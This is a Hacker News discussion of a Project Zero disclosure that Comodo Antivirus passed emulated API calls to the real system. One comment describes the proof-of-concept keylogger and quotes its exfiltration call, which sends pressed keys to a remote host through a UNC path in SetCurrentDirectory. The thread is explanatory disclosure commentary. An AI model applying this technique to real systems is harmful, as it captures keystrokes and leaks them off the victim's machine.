Hacker News new | past | comments | ask | show | jobs | submit login
Comodo Antivirus Forwards Emulated API Calls to the Real API During Scans (chromium.org)
150 points by cespare on March 23, 2016 | hide | past | favorite | 35 comments



Google's Project-Zero https://en.wikipedia.org/wiki/Project_Zero_(Google) is absolutely excellent! Google task top-notch engineers to find zero-day bugs in other company's products, making us all safer.

Very big kudos to Google! The flood of bugs they keep finding and getting other companies to fix is fantastic!


Indeed, they've done some great work.

It's times like this that make me I'm glad I'm not a developer. If I were, I'd be forever worried that today is the day I open up my mail client and see a new message from 'taviso@'.


I'd look forward to it, personally, but I like learning new things about security.


I'd likely donate if it helped the effort. Project Zero has been very successful in terms of vulnerabilities they've had fixed.


I don't think Google needs your money. Best keep it in your pocket.

But yeah, agreed. Project Zero is amazing. It seems like every iOS security release includes at least one major zero-day discovered by Ian Beer.

There is definitely some major talent on that team. It makes me wonder what an equivalently skilled team would look like on the "black market."


When it comes to security research, Tavis Ormandy is truly inspirational. It isn't just about the bugs he discovers, but I find his explanations often very simple to understand.

This is an extremely severe design issue, where an Anti Virus can not only be bypassed, but it can actually be used to compromise an attacked system. Comodo runs suspicious code inside an emulator(VM), but instead of implementing full OS emulation, they allow a lot of the API calls inside the emulator to leak out to the hosting computer, and actually run them with NT AUTHORITY\SYSTEM privileges(The windows equivalent of root).

The exploit code serves as a simple key logger, by repeatedly calling GetKeyState(With system privileges!), and leaking this information to a remote server using the SetCurrentDirectory() API (By calling SetCurrentDirectory("\\\\?\\UNC\\192.168.237.1\\<Pressed key>")

This is a beautiful attack, and I couldn't help but smirk at the "wtf!!!!" comment.


> This is an extremely severe design issue, where an Anti Virus can not only be bypassed, but it can actually be used to compromise an attacked system.

Don't we have exactly that design issue in all anti-virus tools, by definition?

All potentially dangerous data is routed through that single tool that runs with high permissions and performs complex computations. Every single programming error in the anti-virus tool (e.g. a buffer overflow) can potentially lead to a compromised system. An attacker can now choose not just between vulnerabilities of browser, mail client and operating system, but also use vulnerabilities of the anti-virus tool.

So anti-virus is by definition a tool with complex behaviour and a large attack surface.

For many security people, this alone qualifies anti-virus tools as additional threat, not as part of the solution - even without dramatic failures as shown in this particular case.


Some previous Comodo issues:

Comodo ships Adware Privdog worse than Superfish

https://news.ycombinator.com/item?id=9091917

Comodo “Chromodo” Browser disables same origin policy

https://news.ycombinator.com/item?id=11021633

Comodo Internet Security installs and starts a VNC server by default

https://news.ycombinator.com/item?id=11129170


There is no doubt some engineer at Comodo whose heart sinks every time he/she thinks Tavis is done tearing their software apart and opens their bug reports to find yet another gaping security hole.


Actually, we find two issues here:

1) that this huge attack surface existed in the first place. (almost by design)

2) how they "fixed" it. (not questioning their design at all)

The whole bugreport reads like an invitation to find more creative combinations of API calls that their filter forwards to the system. From the first comment:

> They're planning to fix those two issues and review all the remaining API's for missing parameter filtering, but wanted to know if I agree that their design is sound. I said I suppose they're correct in theory, but this is a lot of attack surface [...]


>We have also disabled this feature by default UNTIL we complete the security review.

So creative combinations won't help until they reenable it.


My first thought is: so now I am relying on a company that basicly provides me free services for security audits of other companies, some of which I pay for the services they deliver. (Last one is a stretch.) Of course, I rely on many free things, but it's the second order aspect here that troubles me.

Is there an indication of the complexity of the bugs they are finding? Are they among those that should be caught be QA?


It's a new kind of incompetent-but-too-big company: "too big for google to not give you free expert security review". Well, it's just for companies that can make google's stuff look bad when they enable users to be badly infested with malware.

The magnitude of it in this case is pretty funny ... can you imagine Comodo "security suite" or whatever just 3 months ago? A special secure browser without secure origin policy, a local poorly secured vnc server, a scanning and parsing engine that continually exposes itself to un-trusted input but has ASLR disabled ...

Most of these are not really complicated, they're bad feature ideas. But mass-market security products are feature-driven, not security-driven. So it makes sense that they suck at security.


Looking at this issue and the the issues linked in its last comment...

Why are they running things like unpackers and emulators as "NT AUTHORITY\SYSTEM", instead of farming them to less privileged processes?


From the many issues I've seen with Comodo products, either they don't know what they are doing or are doing it on purpose this way (plausible deniability backdoors).


Never trusted the sandbox functionality. I've been installing Comodo CIS with only the firewall and antivirus, sandboxing disabled, HIPS on low settings on. Any notable exploits left that would bypass that?


I basically just use it for the Firewall and HIPS too, because I cannot find another free firewall solution (that isn't Windows firewall) that is any good, and I cannot find any other example of an HIPS that is as easy to set up and run as the Comodo one.

That said, I'm getting seriously tired of their shadyness/incompetence recently.

I need alternatives.


> that isn't Windows firewall

What's wrong with Windows firewall/defender/anti-virus/whatever it's called these days? It's free, it doesn't try to market itself to you, it doesn't smell like malware, and it doesn't seem to show up in these regular sweeps of disastrous security bugs in the third-party solutions.


Windows Firewall has the annoying habit of letting stuff work until one day it just starts doing its job and doesn't. Typically this is through user prompts that either get spacebar'd away due to focus stealing* or blocked because the user doesn't know what it's asking about.

It's a mess working out what it's doing, fixing it and explaining to the user why their perfectly working system just broke. It could really use some organization tools like the Task Scheduler.

*I thought Microsoft promised at one point around the lead up to Windows 7 that they were going to address their stealing focus issues.


"used to forward", from what I understand this has been fixed.


Would you trust them to fix it?

Seems such a big red flag (as though things couldn't get worse for AV-cred these days).


It's a huge red flag - they've temporarily disabled the function while they audit all APIs they're calling, but they still believe their core design is ok - this means they'll go back to emulate with pass-through everything that THEY can't figure a way to exploit.


It's a double edged sword. Emulating all the OS functions is probably an impossible task for them at the moment. It isn't just about implementing all the OS calls, it's also about implementing them in a way that doesn't allow malware to detect that it's running inside of an emulator.


The sheer wtf of having "windows running on windows" is worth of discarding this AV entirely. How do you like running TWO operating systems at all times? And people wonder why AVs make powerful machines struggle under minimal load...


your post reminded me of two cool stories about "Windows on Windows"

1. Microsoft has reimplemented the NT kernel and services as a userspace LibraryOS called Drawbridge (http://ssrg.nicta.com.au/Events/summer/16/baumann.pdf, slide 21)

2. Microsoft teecchniiccaally also already did this in SysWOW64

First story is much more interesting than the second one


As the funny fact goes, in the System32 directory you have 64-bit binaries, and in the SysWOW64 directory you have 32-bit binaries.


The reason for the 64-bit stuff in the System32 directory makes sense - they need to ensure that the currently-used DLLs and stuff are in the directory that legacy software is looking at.

On the other hand, the SysWOW64 thing could sure have been named better, to make the whole thing clear.


> The reason for the 64-bit stuff in the System32 directory makes sense - they need to ensure that the currently-used DLLs and stuff are in the directory that legacy software is looking at.

Why? There was no legacy 64-bit software. So any software needing to find the 64-bit system directory needed to (at the very least) be recompiled, but probably needed lots of other small changes as well. So why couldn't one of those simple required changes (to create 64-bit versions of legacy software) be to change the path from which it loads its DLLs?



Perhaps they could use Wine here? It would need to be sanboxed etc, but seems like a lot of reusable work.


That sounds like a way to make the attack surface twice as big.


My god what a mess. I think virus writers and hackers should specifically target anti virus suites, given how much of a security risk these pose to the user. Heh, I guess they do just that. I wouldn't be surprised if some of the virus and anti-virus writers are one and the same people or organizations. Because it makes a lot of sense - open the door to intruders and then tell users it's their fault, then manipulate them into buying your security product. Rinse and repeat and make millions.


Does anyone have any good experiences with any anti-virus software?


17 years ago I used F-prot to disinfect my school's computer lab after it was completely overrun by the Melissa worm. The antivirus industry has certainly earned its terrible reputation, but F-prot was actually pretty good software. It was the first with a heuristics engine, and I remember it actually working on a few occasions.


Anti-virus software vendors, for example.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: